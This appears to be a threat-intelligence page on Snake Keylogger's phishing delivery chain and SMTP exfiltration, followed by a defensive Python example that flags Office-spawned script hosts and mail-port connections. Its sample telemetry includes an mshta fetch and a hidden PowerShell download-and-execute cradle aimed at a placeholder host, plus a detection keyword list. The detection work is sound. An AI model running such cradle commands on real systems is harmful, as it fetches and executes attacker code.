Snake Keylogger, also known as "404 Keylogger" or "KrakenKeylogger," is a subscription-based keylogger malware with extensive capabilities. It is designed to covertly monitor and record every keystroke on a computer, including usernames and passwords, and scan applications to steal saved credentials. This data is then exfiltrated using various protocols and delivered back to the hackers, who may use it directly or sell it on the dark web. Snake Keylogger was a persistent threat throughout 2021 and 2022, and its risk remained significant in 2023.
Deployment of Snake Keylogger typically begins with a phishing email carrying a malicious Excel document. The recipient is lured into opening the file under the pretext of reviewing details of a "balance payment." Once opened, the document exploits a known vulnerability to download an HTA file, which in turn uses scripts in several languages (JavaScript, VBScript, and PowerShell) to download the Snake Keylogger Loader module. The Snake Keylogger Deploy module then establishes persistence on the victim's computer and performs process hollowing to run the core module inside a newly created process.
Once running, Snake Keylogger steals sensitive information from the victim's computer and transmits it to the attacker over SMTP. The FortiGuard Antivirus service detects the attached Excel document, the downloaded executable file, and the extracted Snake Keylogger payload with dedicated AV signatures. Despite overlapping capabilities with other malware families such as Agent Tesla, Snake Keylogger remains one of the top malware threats identified by Cofense.
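The delivery chain (Excel document, HTA, script hosts, downloaded loader) and the SMTP exfiltration described in the two paragraphs above are both visible in endpoint telemetry. The following is an added example, not code from Fortinet, Cofense, or any Snake Keylogger analysis: it runs two simple heuristics over process-creation and network-connection events. The event records are constructed sample data; the process-name sets and mail ports are common knowledge, and the `MAIL_CLIENTS` allow-list is an assumption an analyst would tune for their own environment.

```python
"""Detection heuristics for an Office-spawned script chain and mail-port
exfiltration from an unexpected process. Added example; sample events below
are constructed, not real telemetry."""
from dataclasses import dataclass
from typing import Dict, Iterable, List

OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "wscript.exe", "cscript.exe", "powershell.exe", "pwsh.exe"}
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}   # assumed allow-list; tune per environment
MAIL_PORTS = {25, 465, 587}
DOWNLOAD_MARKERS = ("http://", "https://", "downloadstring", "downloadfile", "invoke-webrequest")


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str       # lower-case image file name, e.g. "excel.exe"
    cmdline: str


@dataclass(frozen=True)
class NetEvent:
    pid: int
    dest_port: int


def ancestors(pid: int, procs: Dict[int, ProcEvent]) -> List[ProcEvent]:
    """Parent chain of `pid`, nearest parent first; stops at unknown pids or a cycle."""
    chain: List[ProcEvent] = []
    seen = {pid}
    cur = procs.get(pid)
    while cur is not None and cur.ppid not in seen:
        seen.add(cur.ppid)
        cur = procs.get(cur.ppid)
        if cur is not None:
            chain.append(cur)
    return chain


def detect_delivery_chain(events: Iterable[ProcEvent]) -> List[str]:
    """Flag script hosts that descend from an Office application, and note
    download cradles in their command lines (the HTA -> script -> loader step)."""
    procs = {e.pid: e for e in events}
    alerts: List[str] = []
    for e in procs.values():
        if e.image not in SCRIPT_HOSTS:
            continue
        office = [a for a in ancestors(e.pid, procs) if a.image in OFFICE_APPS]
        if not office:
            continue
        alerts.append(f"pid {e.pid}: {e.image} descends from {office[0].image}")
        if any(m in e.cmdline.lower() for m in DOWNLOAD_MARKERS):
            alerts.append(f"pid {e.pid}: download cradle in command line")
    return alerts


def detect_mail_exfil(events: Iterable[ProcEvent], net: Iterable[NetEvent]) -> List[str]:
    """Flag outbound connections to SMTP ports from anything other than a mail client."""
    procs = {e.pid: e for e in events}
    alerts: List[str] = []
    for n in net:
        if n.dest_port not in MAIL_PORTS:
            continue
        p = procs.get(n.pid)
        image = p.image if p else "<unknown>"
        if image in MAIL_CLIENTS:
            continue
        alerts.append(f"pid {n.pid}: {image} connected to mail port {n.dest_port}")
    return alerts


# Constructed sample telemetry: an Office -> HTA -> PowerShell -> loader chain,
# a legitimate mail client, and an unrelated admin PowerShell session.
SAMPLE_PROCS = [
    ProcEvent(100, 1,   "excel.exe",      "EXCEL.EXE C:\\Users\\u\\balance_payment.xlsx"),
    ProcEvent(200, 100, "mshta.exe",      "mshta.exe http://example.invalid/x.hta"),
    ProcEvent(300, 200, "powershell.exe", "powershell -w hidden -c IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/l')"),
    ProcEvent(400, 300, "loader.exe",     "C:\\Users\\u\\AppData\\Roaming\\loader.exe"),
    ProcEvent(500, 1,   "outlook.exe",    "OUTLOOK.EXE"),
    ProcEvent(600, 1,   "powershell.exe", "powershell Get-Service"),
]
SAMPLE_NET = [NetEvent(400, 587), NetEvent(500, 587), NetEvent(400, 443)]

if __name__ == "__main__":
    for a in detect_delivery_chain(SAMPLE_PROCS) + detect_mail_exfil(SAMPLE_PROCS, SAMPLE_NET):
        print(a)
```

On the sample data the chain heuristic raises four alerts (the Office ancestry and the download cradle for both `mshta.exe` and the child `powershell.exe`) and ignores the stand-alone admin shell, while the mail heuristic flags only `loader.exe` on port 587 and lets Outlook through. Neither heuristic covers the persistence or process-hollowing steps the page mentions; those need different telemetry (autostart entries, memory-image mismatches).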
Description last updated: 2024-10-15T09:25:27.709Z